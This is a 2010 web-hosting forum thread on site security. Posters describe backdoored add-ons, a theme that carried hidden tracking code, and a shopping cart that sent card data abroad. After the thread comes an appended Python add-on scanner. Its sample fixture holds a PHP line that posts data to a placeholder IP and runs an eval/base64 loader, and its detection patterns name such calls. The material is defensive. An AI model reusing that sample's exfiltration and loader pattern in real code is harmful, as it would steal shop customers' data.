Author Topic: Web site security  (Read 488 times)
JhnStcks
« on: May 14, 2010, 08:42:47 PM »

Found this interesting article from the prestashop forums and thought it might be a good read for some of you.

I'm sure Scotserve will have some comments to make on it.

http://www.smashingmagazine.com/2010/01/14/web-security-primer-are-you-part-of-the-problem/
Snowboarding Goggles For all things Snowboarding and Skiing.  Goggles, Helmets, Gloves and Clothing.
The Fashion Agent We are your fashion agent.  Designer Clothes, sunglasses, headphones from top designer brands.
Baa
« Reply #1 on: May 15, 2010, 11:33:43 AM »

Good read, I'll have to look a good few of those up. Thanks for the article.

You cannot conduct today's business with yesterday's methods and expect your business to grow

Moon Stag Designs - Silver, Gold and Gemstone Jewellers. Jewellery for men, women and children.
scotserve
« Reply #2 on: May 15, 2010, 08:12:05 PM »

Excellent article; however, things are not always as easy as they seem, as clients expect certain facilities and security by its very nature can intrude.

The only secure computer is one that is not plugged in.

Outdated scripts are by far the most common problem: people install shopping carts, forums and lots of different scripts and never update, leaving the possibility of security holes.

Another issue from the client side is the "patching" and "add ons" found on forums. Some of these are huge security risks, and how can you trust the integrity of the developer? This is a major concern on open source scripts: all a hacker needs to do is create a "must have add on" and install a back door, giving access to every site that installs the add on. OK, a pretty simplistic view, but how many of you check the coding, or indeed understand the coding, of a patch you install from another forum or elsewhere? Also included here are the good intentions of someone helping get something to work; security is highly unlikely to be on the agenda.

Home security is even worse, with many people using free virus scanners. I also see many people installing the likes of XAMPP on their home machines without realising that this is turning their machine into an internet-connected web server; even fewer understand how to configure a firewall. A friend of mine a few years back refused to install a virus scanner, saying "Why? I won't be storing anything on the computer". Within 3 days he had 360 trojans, and his machine was slowed to a snail's pace because of all the spam emails being sent via his computer. Remember, most hackers are not interested in what's on the machine; they are only interested in gaining access to control the machine, turning it into a zombie computer attached to a spam network.
Scotserve - Premium Domain and Hosting services since 1994
Zola de Cwtchi
« Reply #3 on: May 16, 2010, 09:21:40 AM »

Yikes! :)

I'm all paranoid and itchy now... lovely read for a Sunday morning in bed, I'm going to put lappy down and turn over and go back to sleep!!

All these nightmare scenarios...ignorance is bliss  8)

New Burlesque Community Forum.............http://www.kisskissburlesque.co.uk ...come on Burlesque lovers, have a look and join up for FREE!!
JhnStcks
« Reply #4 on: May 16, 2010, 08:52:29 PM »

> Another issue from the client side is the "patching" and "add ons" found on forums. Some of these are huge security risks, and how can you trust the integrity of the developer? This is a major concern on open source scripts: all a hacker needs to do is create a "must have add on" and install a back door, giving access to every site that installs the add on. OK, a pretty simplistic view, but how many of you check the coding, or indeed understand the coding, of a patch you install from another forum or elsewhere? Also included here are the good intentions of someone helping get something to work; security is highly unlikely to be on the agenda.

I always have a look through coding on PrestaShop modules, but that's because I am interested in how they are built and how they work.

When I first started using PrestaShop I downloaded a theme and suddenly started getting traffic from an unknown website. After investigating the site, it was the theme developer's site. Wondering how they knew I was using the theme, I had a look through their coding and they had inserted a tracking code into the theme. It only tracked which sites were using their theme, but it could have been a lot worse.
scotserve
« Reply #5 on: May 17, 2010, 12:34:35 PM »

> > Another issue from the client side is the "patching" and "add ons" found on forums. Some of these are huge security risks, and how can you trust the integrity of the developer? This is a major concern on open source scripts: all a hacker needs to do is create a "must have add on" and install a back door, giving access to every site that installs the add on. OK, a pretty simplistic view, but how many of you check the coding, or indeed understand the coding, of a patch you install from another forum or elsewhere? Also included here are the good intentions of someone helping get something to work; security is highly unlikely to be on the agenda.
>
> I always have a look through coding on PrestaShop modules, but that's because I am interested in how they are built and how they work.
>
> When I first started using PrestaShop I downloaded a theme and suddenly started getting traffic from an unknown website. After investigating the site, it was the theme developer's site. Wondering how they knew I was using the theme, I had a look through their coding and they had inserted a tracking code into the theme. It only tracked which sites were using their theme, but it could have been a lot worse.

Around 9 years ago we had a client who had a shopping cart built in India. We were responsible for the hosting and installation, and while installing the cart we noted that there was outgoing traffic when there should not have been. Basically, after investigation we found that the cart was farming off all client details, including credit card info and personal information, and sending it to an IP in India. Luckily it was caught before the site went live; that site cost £3k at the time to have built.
You make a valid point though, John: while in your case it was only a tracker, it just goes to show what can and will be inserted for the unwary.
Scotserve - Premium Domain and Hosting services since 1994
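
A first-pass check of the kind this thread talks about (reading an add-on's code before installing it), added here as an example and not written by any of the posters: it lists hosts outside an allowlist that a theme or module references and flags PHP calls worth reading by hand. The function names, the allowlist and the sample files are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# Absolute and protocol-relative URLs in PHP, Smarty templates, JS and CSS.
URL_RE = re.compile(r"""(?:https?:)?//[^\s"'<>)\\]+""", re.I)
# PHP calls that can hide code or open connections; a hit means "read this".
CALL_RE = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|create_function|"
    r"fsockopen|curl_init|curl_exec|file_get_contents|mail)\s*\(", re.I)
TEXT_EXT = {".php", ".tpl", ".js", ".css", ".html", ".htm", ".xml"}

def audit_text(name, text, allowed_hosts):
    """Return (file, line, kind, detail) findings for one file's contents."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for url in URL_RE.findall(line):
            try:
                host = (urlsplit(url).hostname or "").lower()
            except ValueError:      # malformed authority, e.g. a stray "["
                host = ""
            if "." in host and host not in allowed_hosts:
                findings.append((name, no, "external-host", host))
        for call in CALL_RE.findall(line):
            findings.append((name, no, "review-call", call.lower()))
    return findings

def audit_files(files, allowed_hosts):
    """Audit a {relative_path: contents} mapping in path order."""
    return [f for name in sorted(files)
            for f in audit_text(name, files[name], allowed_hosts)]

def load_addon(root):  # read an unpacked theme or module directory
    return {str(p.relative_to(root)): p.read_text("utf-8", errors="replace")
            for p in Path(root).rglob("*")
            if p.is_file() and p.suffix.lower() in TEXT_EXT}

# Constructed sample theme/module; host names and the IP are placeholders.
SAMPLE = {
    "footer.tpl": '<p>{$shop_name}</p>\n'
                  '<img src="http://theme-author.example/hit.gif?s={$base_dir}">\n',
    "header.tpl": '<link href="http://myshop.example/themes/x/global.css">\n',
    "modules/cart/send.php": '<?php\n$c = curl_init("http://203.0.113.5/collect");\n'
                             'eval(base64_decode($cfg));\n',
}

if __name__ == "__main__":
    for finding in audit_files(SAMPLE, {"myshop.example"}):
        print(*finding, sep="\t")
```

A clean result only means nothing obvious was found; watching outgoing traffic on a test install, as in the shopping-cart case above, catches what a text scan misses.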